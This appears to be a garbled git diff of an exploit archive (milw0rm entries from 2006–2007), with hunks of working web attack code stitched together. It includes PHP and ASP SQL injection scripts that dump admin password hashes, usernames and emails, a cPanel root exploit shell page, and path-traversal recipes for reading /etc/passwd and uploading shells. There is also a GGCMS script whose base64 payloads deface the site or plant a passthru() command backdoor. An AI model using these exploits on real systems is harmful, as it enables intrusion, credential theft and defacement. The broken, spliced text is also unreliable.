-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function is_hash($hash)
-{
- if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
- else {return false;}
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$port=80;
-$prefix="lt_";
-$proxy="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-T")
-{
-  $prefix=str_replace("-T","",$argv[$i]);
-}
-}
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$sql="9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("articleId=",$html);
-for ($i=1; $i<=count($temp); $i++)
-{
-$temp2=explode("&",$temp[$i]);
-if (is_hash($temp2[0]))
-{
-  echo "exploit succeeded...\r\n";
-  echo "MD5 hash  -> ".$temp2[0]."\r\n";
-  $sql="9999/**/UNION/**/SELECT/**/user,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
-  $sql=urlencode($sql);
-  $packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: ".$cookie."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  sendpacketii($packet);
-  $temp=explode("articleId=",$html);
-  $temp2=explode("&",$temp[$i]);
-  echo "admin     -> ".$temp2[0]."\r\n";
-  die;
-}
-}
-//if you are here...
-echo "exploit failed...";
-?>
-
-# milw0rm.com [2006-06-03]
+#!/usr/bin/php -q -d short_open_tag=on
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function is_hash($hash)
+{
+ if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
+ else {return false;}
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$port=80;
+$prefix="lt_";
+$proxy="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+if ($temp=="-T")
+{
+  $prefix=str_replace("-T","",$argv[$i]);
+}
+}
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$sql="9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("articleId=",$html);
+for ($i=1; $i<=count($temp); $i++)
+{
+$temp2=explode("&",$temp[$i]);
+if (is_hash($temp2[0]))
+{
+  echo "exploit succeeded...\r\n";
+  echo "MD5 hash  -> ".$temp2[0]."\r\n";
+  $sql="9999/**/UNION/**/SELECT/**/user,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
+  $sql=urlencode($sql);
+  $packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: ".$cookie."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  sendpacketii($packet);
+  $temp=explode("articleId=",$html);
+  $temp2=explode("&",$temp[$i]);
+  echo "admin     -> ".$temp2[0]."\r\n";
+  die;
+}
+}
+//if you are here...
+echo "exploit failed...";
+?>
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1875.htm b/platforms/php/webapps/1875.htm
index 3bbd6ef0b..e230e048c 100755
--- a/platforms/php/webapps/1875.htm
+++ b/platforms/php/webapps/1875.htm
@@ -1,271 +1,271 @@
-
-
-
    
-
-
-
-
-  
-  
-
-  
-  
-
-
-
-  
-  
-
-
-  
-  
-
-
-  
-  
-
-
-
-  
-
-  
-
-
-
-
-  
-  
-
-
-  
-  
-
-
-  
-  
-
-
-  
-  
-
-
-
-  
-  
-
-
-
-  
-  
-
-
-
-  
-  
-
-
-  
-  
-
-  
-  
-
-
-
-  
-  
-
-
-  
-
-  
-
-
-  
-  
-
-
-
-  
-  
-
-
-  
-
-  
-
-
-
-  
-  
-
-
-  
-  
-
-
-
-  
-  
-
-
-  
-  
-
-
    
-Profile
-
    
-   User Name
-  
-
-   ajann  
     
    
-   Membership Number
-  
-   247  
    
-   First Registered
-  
-   Sat 03 Jun 2006 at 09:20:14 pm  
    
-
-   Last Login
-  
-   Sat 03 Jun 2006 at 09:21:45 pm  
    
-   Number of posts
-
-  
-   0  
    
-   Status
-  
-   Member  
    
-Entries marked with a * are 
-required
-
    
-User Name *
-
-  
-
-  
    
-   Your Name  
-
-   
-  
    
-Password *
-  
-
-
-  
    
-Confirm Password *
-  
-
-  
    
-E-mail *
-  
-
-Hide Email Address?  Yes
-No
-  
    
-Prefered Language  
-    
-  
    
-    Homepage  
-   
-  
    
-
-ICQ  
-
-  
    
-AOL Instant Messenger (AIM)  
-
-  
    
-Yahoo Instant Messenger (YIM)  
-
-  
    
-Location*  
-
-  
    
-Hobbies/Interests  
-
-  
    
-Gender (M/F)  
-
-  
    
-Date of Birth  
-
-
-
-  
    
-Signature (< 100 characters)  
-
-
-  
    
-Use an Avatar ?  
-Current Avatar - 
-
-No Avatar   
-
    
-Upload Avatar ?
    (GIF, JPG or PNG only)      		
-
-
-  
    
-
-Submit
-  
-
-
-  
    
-
-
-
-# milw0rm.com [2006-06-04]
+
+
+
    
+
+
+
+
+  
+  
+
+  
+  
+
+
+
+  
+  
+
+
+  
+  
+
+
+  
+  
+
+
+
+  
+
+  
+
+
+
+
+  
+  
+
+
+  
+  
+
+
+  
+  
+
+
+  
+  
+
+
+
+  
+  
+
+
+
+  
+  
+
+
+
+  
+  
+
+
+  
+  
+
+  
+  
+
+
+
+  
+  
+
+
+  
+
+  
+
+
+  
+  
+
+
+
+  
+  
+
+
+  
+
+  
+
+
+
+  
+  "
+      Set calistir = objReg.Execute(metin)
+      baspassword = Replace(calistir.Item(0), "Password:" , "" )
+      baspassword = Replace(baspassword, "" , "" )
+
+     
+      objReg.Pattern = "email:[A-Za-z0-9@.]+"
+      Set calistir = objReg.Execute(metin)
+      basemail = Replace(calistir.Item(0), "email:" , "" )
+      basemail = Replace(basemail, "" , "" )
+
+End If  
+
+
+ 
+Set bulunanlar = Nothing
+Set objReg = Nothing
+
+%>
+
+
    
+ 
+ajann

    
+
+
    
+Profile
+
    
+   User Name
+  
+
+   ajann  
     
    
+   Membership Number
+  
+   247  
    
+   First Registered
+  
+   Sat 03 Jun 2006 at 09:20:14 pm  
    
+
+   Last Login
+  
+   Sat 03 Jun 2006 at 09:21:45 pm  
    
+   Number of posts
+
+  
+   0  
    
+   Status
+  
+   Member  
    
+Entries marked with a * are 
+required
+
    
+User Name *
+
+  
+
+  
    
+   Your Name  
+
+   
+  
    
+Password *
+  
+
+
+  
    
+Confirm Password *
+  
+
+  
    
+E-mail *
+  
+
+Hide Email Address?  Yes
+No
+  
    
+Prefered Language  
+    
+  
    
+    Homepage  
+   
+  
    
+
+ICQ  
+
+  
    
+AOL Instant Messenger (AIM)  
+
+  
    
+Yahoo Instant Messenger (YIM)  
+
+  
    
+Location*  
+
+  
    
+Hobbies/Interests  
+
+  
    
+Gender (M/F)  
+
+  
    
+Date of Birth  
+
+
+
+  
    
+Signature (< 100 characters)  
+
+
-
    
-Powered By  Ashiyane Security Corporation  www.Ashiyane.ir
-
-
-# milw0rm.com [2006-10-13]
+
+cPanel <= 10.8.x cpwrap root exploit (PHP)
+


    
+



    Sorry Safe-mode Is On ( Script Not Work On This Server ) 




    ";
+echo "


    Powered By Ashiyane Security Corporation      www.Ashiyane.ir";
+exit();
+}
+
+$disablef = @ini_get("disable_functions");
+if (!empty($disablef))
+{
+ $disablef = str_replace(" ","",$disablef);
+ $disablef = explode(",",$disablef);
+ if (in_array("passthru",$disablef))
+ {
+ echo "




    Sorry Passthru Is Disable ( Script Not Work On This Server ) 




    ";
+ echo "


    Powered By Ashiyane Security Corporation      www.Ashiyane.ir";
+ exit();
+ }
+}
+
+?>
+
+
+Command : 
+
+",$ahash[1 ]);
-$hash = $bhash[ 0];
-
-if(strlen($hash) !=  32){ 
-die("Exploit failed..\n"); 
-}else{ 
-die("Username: $name MD5: $hash\n"); 
-}
-}
-?>
-
-# milw0rm.com [2006-10-16]
+#!/usr/bin/php
+",$aname[1 ]);
+$name = $bname[ 0];
+$ahash = explode( "
- 
- 
- 
- 
- 
- 
    
- 
-# END LOCAL HTML FILE                                                                                                     #
-###########################################################################################################################
-# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off                   #
-# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files)              #
-###########################################################################################################################
-\=========================================================================================================================/
-
-/=========================================================================================================================\
-############################## .: Uploading of Malicious Files:. ##########################################################
-# START LOCAL HTML FILE:                                                                                                  #
-
    
-
-
-
-
-
-
-
-
    
-# END LOCAL HTML FILE                                                                                                     #
-###########################################################################################################################
-# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
-# will execute... EG: http://www.site.com/file/phpshell.php.off                                                           #
-###########################################################################################################################
-\=========================================================================================================================/
-
-                                       /++++++++++++++++++++++++++++\
-                                       | Be good, and dont be too   |
-                                       | hopeful about finding      |
-                                       | yourself a gibbon running  |
-                                       | this script. It predates   |
-                                       | my #999999 hair.           |
-                                       \++++++++++++++++++++++++++++/
-
-      /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
-      |---------------------------------------|
-      | <&bk> stfu flame                      |
-      | <~PhaZe_One> no fame without flame    |
-      | <+c|p> I love you flame               |
-      | <%emc2> flame wishes death upon you   |
-      |  are you emo flame?       |
-      | <&[myg0t]40> flame dont be mad        |
-      | *~str0ke humps flame's leg            |
-      | <&ZoNe_VoRTeX> <3 flame               |
-      |---------------------------------------|
-      \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/
-
-# milw0rm.com [2006-12-02]
+/*******************************************\
+| flame vrs Simple File Manager <=0.24=>    |
+| http://onedotoh.sourceforge.net/          |
+| Various Vulnerbilities Including:         |
+\*******************************************/
+/+++++++++++++++++++++++++++++++++++++++++++\
+| Using the scripts supplied by the webapp: |
+| Reading of Arbitrary files                |
+| Deletion of Arbitrary files               |
+| Modification of Arbitrary files           |
+| Creation of Arbitrary files               |
+| Uploading of Malicious files              |
+\+++++++++++++++++++++++++++++++++++++++++++/
+
+
+/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
+| Simple File Manager (SFM) is a web based  |
+| file management utility.                  |
+| It is designed to be used by those that   |
+| don't want to use ftp or SHOULD NOT use   |
+| ftp. It can be dropped into a specific    |
+| directory and give access to that         |
+| directory as well as any directory below  |
+| it, including those created by SFM. It    |
+| can be placed in a specific directory and |
+| configured to give access to other        |
+| directories outside of its location       |
+| (centralized). SFM gives its user upload, |
+| rename, delete, directory creation as     |
+| well as directory navigation (within its  |
+| tree limits), as well as Create New File; |
+| it also includes an image viewer, text    |
+| viewer and mime type downloading.         |
+\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
+ | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
+ | Thats the description from the author...|
+ | Which basically outlines all of its     |
+ | vulnerbilities.                         |
+ \_________________________________________/
+
+/=========================================================================================================================\
+############################ .:Reading of Arbitrary Files:. ###############################################################
+# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
+# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
+###########################################################################################################################
+\=========================================================================================================================/
+
+/=========================================================================================================================\
+############################ .:Deletion of Arbirary Files:. ###############################################################
+# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
+# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
+###########################################################################################################################
+\=========================================================================================================================/
+
+/=========================================================================================================================\
+############################# .:Modification of Arbitrary Files:. #########################################################
+# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext=                                                              #
+# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
+###########################################################################################################################
+\=========================================================================================================================/
+
+/=========================================================================================================================\
+############################# .:Creation of Arbitrary Files:. #############################################################
+# START LOCAL HTML FILE:                                                                                                  #
+ 
    
+ 
    Filename: 
+ 
+ 
-				
-			
-[/code]
-
-Kacper :)
-*/
-if ($argc<4) {
-print_r('
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-Usage: php '.$argv[0].' host path action {if action2: cmd} OPTIONS
-host:       target server (ip/hostname)
-path:       GGCMS path
-action:    1 Remote Auto Deface Exploit
-           2 Remote Code Execution Exploit
-action2 {cmd:        a shell command (ls -la)}
-Options:
- -p[port]:    specify a port other than 80
- -P[ip:port]: specify a proxy
-Example:
-if action1:
-php '.$argv[0].' 127.0.0.1 /GGCMS/ 1 -P1.1.1.1:80
-if action2:
-php '.$argv[0].' 127.0.0.1 /GGCMS/ 2 ls -la -P1.1.1.1:80
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-');
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacket($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-$host=$argv[1];
-$path=$argv[2];
-$action=(int)$argv[3];
-$cmd="";
-$port=80;
-$proxy="";
-for ($i=4; $i<$argc; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-if (($action!=1) and ($action!=2)) {echo "select exploit action...";}
-if ($action==1)
-{
-$dt = base64_decode("PFNUWUxFID10ZXh0L2Nzcz5CT0RZIHsgDQpTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMD".
-"AwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNI".
-"QURPVy1DT0xPUjogZGFya2dyYXk7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjZWVlZW".
-"VlOyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICMwMDAwMDA7IFNDUk9MTEJBUi1UUkFDSy1D".
-"T0xPUjogZ3JheTsgU0NST0xMQkFSLURBUktTSEFET1ctQ09MT1I6ICMwMDAwMDAgDQp9IA".
-"0KQTpsaW5rIHsgDQpDT0xPUjogZGFya2JsdWU7IFRFWFQtREVDT1JBVElPTjogbm9uZSAN".
-"Cn0gDQpBOnZpc2l0ZWQgeyANCkNPTE9SOiAjMDAwMDg4OyBURVhULURFQ09SQVRJT046IG".
-"5vbmUgDQp9IA0KQTpob3ZlciB7IA0KQ09MT1I6ICMwMDAwMDAgDQp9IA0KYm9keSwgdGQs".
-"IHRoIHsgDQpjb2xvcjogIzAwMDAwMDsgDQp9IA0KdGFibGUsIHAsIHRkLCB0ciANCnsgDQ".
-"p2aXNpYmlsaXR5OmhpZGRlbjsgDQp9IA0KYm9keSB7IA0KYmFja2dyb3VuZC1jb2xvcjog".
-"IzAwMDAwMDsgDQpiYWNrZ3JvdW5kLWltYWdlOiB1cmwoImh0dHA6Ly9pbWc4OS5pbWFnZX".
-"NoYWNrLnVzL2ltZzg5LzUxMjUvaGFja3BvNi5qcGciKTsgDQp9IA0KPC9TVFlMRT4gDQo8".
-"c2NyaXB0IGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij4gDQo8IS0tIA0KdmFyIGxlZnQ9InsiOy".
-"ANCnZhciByaWdodD0ifSI7IA0KdmFyIG1zZz0iICAtIC0gSGFja2VkIEJ5IERFVklMIFRF".
-"QU0gLjpXZSBPd256IFlvdSE6LiAtIC0gICI7IA0KdmFyIHNwZWVkPTIwMDsgDQpmdW5jdG".
-"lvbiBzY3JvbGxfdGl0bGUoKSB7IA0KZG9jdW1lbnQudGl0bGU9bGVmdCttc2crcmlnaHQ7".
-"IA0KbXNnPW1zZy5zdWJzdHJpbmcoMSxtc2cubGVuZ3RoKSttc2cuY2hhckF0KDApOyANCn".
-"NldFRpbWVvdXQoInNjcm9sbF90aXRsZSgpIixzcGVlZCk7IA0KfSANCnNjcm9sbF90aXRs".
-"ZSgpOyANCi8vIEVuZCAtLT4gDQo8L3NjcmlwdD4");
-
-$data.='-----------------------------7d6224c08dc
-Content-Disposition: form-data; name="saveSubpage"
-
-1
------------------------------7d6224c08dc
-Content-Disposition: form-data; name="subpageName"
-
-../../../templates/default/index
------------------------------7d6224c08dc
-Content-Disposition: form-data; name="subpageContent"
-
-'.$dt.'
------------------------------7d6224c08dc--
-';
-
-echo "Hack ...\n";
-$packet ="POST ".$p."admin/subpages.php HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacket($packet);
-sleep(1);
-$temp=explode('http://img89.imageshack.us/img89/5',$html);
-$temp2=explode('25/hackpo6.jpg',$temp[1]);
-$sprawdz=trim($temp2[0]);
-if ($sprawdz == 1)
-    {
-echo "look now to index.php!! ...\n";
-    }
-die("\n\nErr0r");
-}
-elseif ($action==2)
-{
-$hauru=base64_decode("Ijs/Pjw/cGhwIG9iX2NsZWFuKCk7Ly9SdWNob215IHphbWVrIEhhdXJ1IDs".
-"tKWVjaG8iLi4uSGFja2VyLi5LYWNwZXIuLk1hZGUuLmluLi5Qb2xhbmQhIS".
-"4uLkRFVklMLlRFQU0uLnRoZS4uYmVzdC4ucG9saXNoLi50ZWFtLi5HcmVld".
-"HouLi4iO2VjaG8iLi4uR28gVG8gREVWSUwgVEVBTSBJUkM6IGlyYy5taWx3".
-"MHJtLmNvbTo2NjY3ICNkZXZpbHRlYW0iO2VjaG8iLi4uREVWSUwgVEVBTSB".
-"TSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvIjtpbmlfc2V0KCJtYX".
-"hfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYXNzdGhydSgkX".
-"1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+PD9waHAgZWNobyBLYWNwZXIg".
-"SGFjayA6UCINCg0KDQo=");
-
-$data.='-----------------------------7d6224c08dc
-Content-Disposition: form-data; name="saveSubpage"
-
-1
------------------------------7d6224c08dc
-Content-Disposition: form-data; name="subpageName"
-
-../../../templates/default/index
------------------------------7d6224c08dc
-Content-Disposition: form-data; name="subpageContent"
-
-'.$hauru.'
------------------------------7d6224c08dc--
-';
-
-echo "Insert Hauru!! ...\n";
-$packet ="POST ".$p."admin/subpages.php HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacket($packet);
-sleep(1);
-
-echo "... now remote code execution...\n";
-$packet ="GET ".$p."index.php?page=index HTTP/1.1\r\n";
-$packet.="HAURU: ".$cmd."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacket($packet);
-if (strstr($html,"Hauru"))
-{
-$temp=explode("Hauru",$html);
-die($temp[1]);
-}
-echo "Exploit err0r :(\n";
-echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n";
-}
-?>
-
-# milw0rm.com [2007-02-05]
+
+[/code]
+....
+You can run exploit in html:
+[code]
+
+Kacper Security & Hacking Blog :: DEVIL TEAM :: Exploit :: http://www.rahim.webd.pl/
+
    
+				
+				
+				
-
    
-
    
-
-
    
-  
    
-  
-  
    
-
    
-
-
-
-<%
-End If
-%>
-
-<%
-Response.Write "
    "
-Response.Write "
    "
-Response.Write "
    "
-Response.Write ""
-Response.Write "En iyi "
-Response.Write ""
-Response.Write ""
-Response.Write "1152x864 "
-Response.Write ""
-Response.Write "çözünürlük ve "
-Response.Write "Firefox "
-Response.Write "ile görüntülünebilir.
    "
-
-Response.Write "
    "
-Response.Write ""
-Response.Write "Exploit coded by "
-Response.Write ""
-Response.Write ""
-Response.Write "ajann"
-Response.Write ""
-Response.Write "
    "
-
-%>
-
-# milw0rm.com [2007-02-08]
+<% Response.Buffer = True %>
+<% On Error Resume Next %>
+<% Server.ScriptTimeout = 100 %>
+
+<%
+'===============================================================================================
+'[Script Name: LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit
+'[Coded by   : ajann
+'[Author     : ajann
+'[Contact    : :(
+'[S.Page     : http://www.lightro.de.tc/
+'[ExploitName: exploit2.asp
+
+'[Note  : exploit file name =>exploit2.asp
+'[Update: + Get Header
+'[Update: + Get Whois Info
+'===============================================================================================
+
+%>
+
+<%
+
+title="LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit" 'Vuln Title
+
+%>
+
+<% = title %>
+
+
+
+
+
+
+
+
+
+
    
+<% = title %>
+

    
+
+  
+    
+    
+  
+
+
    
+    TARGET:Example:[http://x.com/path]
    
+    USER ID:Example:[User 
+    ID=1]
    
+      		
+ 
    
+
    
+
    
+
    
+
+
    
+
+<%
+islem = Request.QueryString("islem")    
+
+If islem = "hata1" Then 
+Response.Write "There is a problem! Please complete to the whole spaces"
+End If
+
+If islem = "hata2" Then 
+Response.Write "There is a problem! Please right character use"
+End If
+
+If islem = "hata3" Then 
+Response.Write "There is a problem! Add ""http://"""
+End If
+
+If islem = "hata4" Then 
+Response.Write "There is a problem! Just Numeric Character!"
+End If
+
+%>
+
+<%  
+
+If islem = "get" Then
+
+id= Request.Form("id")
+
+file="index.php?section=projects&ID="
+sql="-1'%20union%20select%200,1,6,7,8,9,2,3,4,5,10"
+sql1=",concat(char(85,115,101,114,110,9"
+sql2="7,109,101,58),name,char(32),char(80,97,"
+sql3="115,115,119,111,114,100,58),password"
+sql4="),concat(char(101,109,97,105,108,58),email),1"
+sql5="3,14,1,5,3,4,29%20from%20users%20where%20ID="
+sql6=id
+sql7="/*"
+
+
+idform = Request.Form("id")
+targettext = Request.Form("text1")
+arama=InStr(1, targettext, "union" ,1)
+arama2=InStr(1, targettext, "http://" ,1)
+
+If targettext="" Then
+Response.Redirect("exploit2.asp?islem=hata1")
+
+Else
+If arama>0 then 
+Response.Redirect("exploit2.asp?islem=hata2")
+
+Else
+If arama2=0 then 
+Response.Redirect("exploit2.asp?islem=hata3")
+
+Else
+IF Not IsNumeric(idform) Then
+Response.Redirect("exploit2.asp?islem=hata4")
+
+Else
+%> 
+
+<%
+
+target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6+sql7
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+  
+take =  .Responsetext
+End With
+SET objtake = Nothing
+End Function
+
+
+get_username = take(target1)
+
+getdata=InStr(get_username,"0  0/" )
+username=Mid(get_username,getdata+5,90)
+
+Dim metin
+metin = take(target1)  
+
+Dim objReg
+Set objReg = New RegExp
+objReg.Global = False
+objReg.IgnoreCase = True
+
+objReg.Pattern = "Username:[A-Za-z0-9ý]+ Pass"
+Dim calistir, istediginString
+Set calistir = objReg.Execute(metin)
+
+
+If calistir.Count = 0 Then
+     Response.write "Not True"
+Else
+      basusername = Replace(calistir.Item(0), "Username:" , "" )
+      basusername = Replace(basusername, " Pass" , "" )
+
+
+
+      objReg.Pattern = "Password:[A-Za-z0-9ý]+
    
+  
+    
+    
+  
+
+  
+    
+    
+  
+
+ 
+    
+    
+  
+
+
           
+     
+    Username:<%=basusername%>
    
+ 
           
+     
+    Password:<%=baspassword%>
    
+ 
           
+     
+    Email:<%=basemail%>
    
